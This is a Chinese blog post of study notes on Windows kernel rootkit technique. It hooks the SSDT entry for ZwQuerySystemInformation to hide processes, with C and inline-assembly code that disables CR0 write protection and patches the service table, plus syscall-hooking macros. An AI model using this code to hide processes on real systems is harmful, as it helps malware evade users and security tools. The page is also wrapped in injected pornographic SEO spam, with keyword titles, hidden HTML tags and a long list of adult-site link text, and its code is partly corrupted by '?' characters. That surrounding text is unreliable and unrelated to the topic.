青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

S.l.e!ep.¢%

像打了激速一樣,以四倍的速度運轉,開心的工作
簡單、開放、平等的公司文化;尊重個性、自由與個人價值;
posts - 1098, comments - 335, trackbacks - 0, articles - 1
  C++博客 :: 首頁 :: 新隨筆 :: 聯系 :: 聚合  :: 管理

HOOK SSDT Hide Process (三)

Posted on 2009-10-25 16:06 S.l.e!ep.¢% 閱讀(496) 評論(0)  編輯 收藏 引用 所屬分類: RootKit
前:HOOK SSDT Hide Process (二)

[新資料] SSDT HIDE Process
[舊資料] HOOK SSDT實現進程隱藏

舊資料中的 Hook 是如此實現的

  1. VOID Hook()
  2. {
  3. ? ? ? ? DbgPrint("Entry Hook()\n");
  4. ? ? ? ? OldAddress =(ULONG)KeServiceDescriptorTable->ServiceTableBase + 4*0xAd;//用windbg反匯編查到zwquerysysteminformationde
  5. ???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????//的ID號是0xADh
  6. ? ? ? ? DbgPrint("KeServiceDescriptorTable->ServiceTableBase is :0x%0x\n",KeServiceDescriptorTable->ServiceTableBase);
  7. ? ? ? ? //保存原來函數的地址
  8. ? ? ? ? OldZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION) *(ULONG *)OldAddress;
  9. ??DbgPrint("OldZwQuerySystemInformation is :0x%0x\n", OldZwQuerySystemInformation);
  10. ??DbgPrint("MyZwQuerySystemInformation is :0x%0x\n", MyZwQuerySystemInformation);
  11. ? ?//取消內存寫保護
  12. ??_asm
  13. ??{
  14. ? ? cli
  15. ???
  16. ? ?? ?mov??eax,cr0??
  17. ? ?? ?and??eax,not 10000h
  18. ? ?? ?mov??cr0,eax
  19. ??????
  20. ??}
  21. ???
  22. ? ? ? ? *(ULONG*)OldAddress =(ULONG) MyZwQuerySystemInformation;? ?? ? //mark? ?MyZwQuerySystemInformation;
  23. ??
  24. ??//還原內存寫保護
  25. ??_asm
  26. ??{??
  27. ??
  28. ? ? mov??eax,cr0
  29. ? ?? ?or? ?eax,10000h
  30. ? ?? ?mov??cr0,eax
  31. ? ?? ?sti
  32. ??
  33. ??
  34. ??}
  35. }

OldAddress =(ULONG)KeServiceDescriptorTable->ServiceTableBase + 4*0xAd;
//用windbg反匯編查到zwquerysysteminformationde的ID號是0xADh
1. zwquerysysteminformationde的ID號是0xADh?? 這個ID是如何得來的?
A: 用 Windbg? u 顯示 zwquerysysteminformation 所在地址都可以看到, 見Q3

Q2. 4表示指針的大小?如果在 64機器上就應該是 8 了?
A:?? 是的,所以正規寫法應該是
#define SYSTEMSERVICE(_function)? KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)_function+1)]

Q3. 另一種寫法是
#define SYSTEMSERVICE(_function)? KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)_function+1)]
// save old system call locations
OldZwQuerySystemInformation =(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation));

*(PULONG) 是地址的偏移類型, 相關于 *4, 但 PUCHAR 又是什么? _function+1 又表示什么?
"將_Function+1即可確定ServiceID的位置,即在系統服務調度表中的入口地址"

A:四個有用的宏
SYSTEMSERVICE macro:可以獲得由ntoskrnl.exe導出函數,以Zw*開頭函數的地址,這個函數的返回值就是Nt*函數,Nt*函數的地址就在SSDT中
SYSCALL_INDEX macro:獲得Zw*函數的地址并返回與之通信的函數在SSDT中的索引。
這兩個宏之所以能工作,是因為所有的Zw*函數都開始于opcode:MOV eax, ULONG,這里的ULONG就是系統調用函數在SSDT中的索引。
例:
00401023????? A1 94214000??????? mov???? eax, dword ptr [402194]
A1 表示?? ?mov eax
94214000 表示ULONG
所有 Zw* 開頭的函數最開始的第一條指令是? MOV eax, ULONG, 這里的ULONG就是系統調用函數在SSDT中的索引。
_function 是函數地址, (PUCHAR)_function+1?? 指向 ULONG, 再把它轉成 PULONG? ,就可以拿到 系統調用函數在SSDT中的索引 (Nt*函數的地址)


HOOK_SYSCALL和UNHOOK_SYSCALL macros:獲得Zw*函數的地址,取得他的索引,自動的交換SSDT中索引所對應的函數地址和我們hook函數的地址。
這四個宏具體是:
#define SYSTEMSERVICE(_func)?KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)_func+1)]
??
#define SYSCALL_INDEX(_Function) *(PULONG)((PUCHAR)_Function+1)
??
#define HOOK_SYSCALL(_Function, _Hook, _Orig )??\
_Orig = (PVOID) InterlockedExchange( (PLONG)???\
&MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Hook)
??
#define UNHOOK_SYSCALL(_Func, _Hook, _Orig )??\
InterlockedExchange((PLONG)?\
&MappedSystemCallTable[SYSCALL_INDEX(_Func)], (LONG) _Hook)

Hook SSDT 其實就是把 SSDT 里面的函數地址替換成自己的處理函數, 一般在 DriverEntry() 就HOOK了
在 DriverUnload() 里再把 SSDT 里面的函數地址還原?

在寫 KeServiceDescriptorTable.ServiceTableBase? 時有一個重要步驟
需要去掉'內存保護'才可以寫入
Q:為何這個變量會受到'內存保護'?? 受'內存保護'的意義是?既然有辦法去掉'內存保護',那為何還要保護呢?

目前所知,去掉'內存保護'有兩種方法
1. 設置 CR0 寄存器的標志位
2. MDL

Q1: 這兩種方法的區別是什么?
Q2: MDL 的原理又是什么?

青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品
  • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            老司机久久99久久精品播放免费| 久久精品日产第一区二区| 欧美黄色小视频| 久久综合九九| 欧美二区在线观看| 欧美另类变人与禽xxxxx| 欧美日韩国产页| 欧美国产在线观看| 国产精品国产三级国产a| 国产精品一区二区三区四区 | 欧美成人有码| 欧美精品日韩一本| 欧美精品在线一区| 国产精品日韩久久久久| 极品日韩av| 99视频超级精品| 午夜视频一区二区| 麻豆成人91精品二区三区| 久久久久久久97| 日韩小视频在线观看| 亚洲欧美在线x视频| 久久精品亚洲精品国产欧美kt∨| 欧美成人视屏| 亚洲一区二区三区国产| 久久中文在线| 国产精品久久久亚洲一区| 国内成+人亚洲| 亚洲激情在线播放| 欧美一区二区三区视频| 91久久中文字幕| 先锋亚洲精品| 欧美日韩国内自拍| 亚洲国产精品激情在线观看| 亚洲在线免费观看| 欧美激情亚洲综合一区| 欧美诱惑福利视频| 欧美系列一区| 日韩午夜精品视频| 美国十次成人| 亚洲一区欧美| 欧美日韩亚洲成人| 亚洲精品久久久久久下一站 | 欧美精品1区| 国内成人精品2018免费看 | 韩日成人av| 亚洲一区二区免费看| 亚洲福利一区| 久久在线播放| 在线播放亚洲| 久久五月激情| 欧美在线观看网站| 国产在线精品一区二区中文| 亚洲永久精品大片| 99精品国产福利在线观看免费| 美日韩精品免费| 亚洲激情一区二区| 免费在线观看精品| 久久九九电影| 在线电影一区| 欧美成人一区二区三区| 久久久久九九视频| 国内精品久久久久伊人av| 久久久久国产精品厨房| 久久久精品五月天| 亚洲激情av| 亚洲伦理在线| 妖精成人www高清在线观看| 久久免费视频在线观看| 欧美在线视频不卡| 伊人久久大香线| 这里只有视频精品| 欧美激情亚洲| 欧美福利电影在线观看| 亚洲欧洲精品成人久久奇米网| 亚洲国产精品一区二区www在线| 久久久久**毛片大全| 久久夜色精品亚洲噜噜国产mv| 在线观看欧美精品| 亚洲伦理在线| 国产精品亚洲成人| 久久欧美中文字幕| 欧美精品激情在线观看| 亚洲专区在线| 欧美专区日韩专区| 亚洲精品男同| 午夜精品网站| 亚洲精品久久久久久久久久久久久 | 国产日韩精品一区二区三区在线| 久久免费99精品久久久久久| 久久综合亚洲社区| 一二三区精品福利视频| 亚洲欧美日韩精品久久| 在线精品视频一区二区| 999亚洲国产精| 老色批av在线精品| 在线视频精品| 久久精品视频一| 一区二区三区日韩在线观看| 欧美一区二区三区久久精品 | 国产一区二区三区在线观看精品| 免费高清在线一区| 国产精品国产三级国产专播精品人| 久久亚洲风情| 国产精品萝li| 欧美激情精品久久久久久久变态| 国产精品久久久久99| 欧美激情自拍| 国自产拍偷拍福利精品免费一| 亚洲日本激情| 亚洲大胆女人| 欧美一二三区精品| 亚洲尤物影院| 欧美乱妇高清无乱码| 麻豆精品精华液| 欧美日韩中文字幕在线视频| 在线视频精品一| 久久在线视频| 久久夜色精品国产欧美乱| 国产精品电影观看| 欧美激情一区二区三区在线视频观看 | 性欧美18~19sex高清播放| 久久精品免费观看| 午夜久久久久| 欧美日韩国产小视频| 欧美mv日韩mv国产网站app| 国产精品视频久久一区| 一区二区日韩免费看| 一区二区高清在线观看| 欧美www视频| 欧美91福利在线观看| 国产一区二区三区久久精品| 亚洲视频一区二区在线观看 | 亚洲免费在线看| 亚洲无线观看| 欧美日韩亚洲一区二| 亚洲精品国产精品乱码不99| 亚洲国产精品精华液网站| 久久在线视频| 蜜臀99久久精品久久久久久软件| 韩国自拍一区| 久热re这里精品视频在线6| 老司机精品久久| 亚洲高清自拍| 欧美www在线| 99精品欧美| 午夜精品影院| 国产亚洲福利社区一区| 久久精品亚洲一区二区| 免费国产自线拍一欧美视频| 亚洲高清资源| 欧美另类久久久品| 一区二区三区欧美在线| 欧美在线亚洲综合一区| 黄色成人片子| 欧美精品v日韩精品v韩国精品v| 亚洲美女中文字幕| 亚洲欧美日韩区| 黄色国产精品| 欧美理论电影在线播放| 亚洲深夜福利| 久久先锋资源| 亚洲精品三级| 欧美系列亚洲系列| 欧美一级淫片播放口| 免费看精品久久片| 亚洲香蕉网站| 一色屋精品视频免费看| 欧美激情一区| 亚洲欧美综合网| 亚洲国产成人在线视频| 亚洲欧美日韩国产中文| 一区二区三区在线看| 欧美顶级少妇做爰| 午夜精品一区二区三区在线视 | 欲色影视综合吧| 欧美激情久久久| 亚洲一区二区免费视频| 米奇777超碰欧美日韩亚洲| 亚洲午夜三级在线| 黄网动漫久久久| 欧美日韩一区二区三区免费看| 亚洲欧美视频一区| 亚洲人成高清| 欧美日韩免费视频| 午夜亚洲伦理| 亚洲国产日本| 国产精品免费看片| 欧美高清视频在线播放| 欧美一区观看| 日韩视频免费观看高清完整版| 可以看av的网站久久看| 亚洲午夜视频在线| 亚洲美女中出| 久久亚洲影院| 亚洲一品av免费观看| 亚洲国产日韩欧美在线99| 欧美在线免费视屏| 国产精品99久久99久久久二8| 亚洲福利视频免费观看| 国产日韩欧美精品|